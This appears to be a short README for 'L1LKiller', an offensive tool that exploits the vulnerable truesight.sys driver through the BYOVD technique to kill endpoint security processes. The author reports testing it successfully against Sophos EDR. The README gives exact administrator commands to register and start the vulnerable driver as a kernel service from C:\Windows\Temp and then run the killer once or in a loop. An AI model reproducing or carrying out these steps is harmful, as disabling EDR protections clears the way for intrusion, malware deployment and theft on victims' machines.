L1LKiller is a tool developed to exploit the truesight.sys
driver of the Rogue Anti-Malware Driver 3.3 software through the BYOVD (Bring Your Own Vulnerable Driver) technique. About 1 year ago this vulnerability was fixed and currently the driver is present in LOLDrivers (Living Off The Land Drivers). I developed this project at the time of the release of the discovery of this driver, where I was able to successfully perform the test on Sophos EDR. Since there is already a mitigation, I decided to publish this project that I kept private for a while.
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/ /___/ / /___/ /| |/ / / / __/ /
/_____/_/_____/_/ |_/_/_/_/\___/_/
[Coded by Brosck]
Usage: C:\Windows\Temp\L1LKiller\L1LKiller.exe [OPTIONS]
single, kill processes only once
loop, kill processes in a loop
L1LKiller.exe single
L1LKiller.exe loop
In cmd.exe as administrator:
sc create l1lkiller binPath="C:\Windows\Temp\L1LKiller\L1LKiller.sys" type=kernel
sc start l1lkiller
L1LKiller.exe single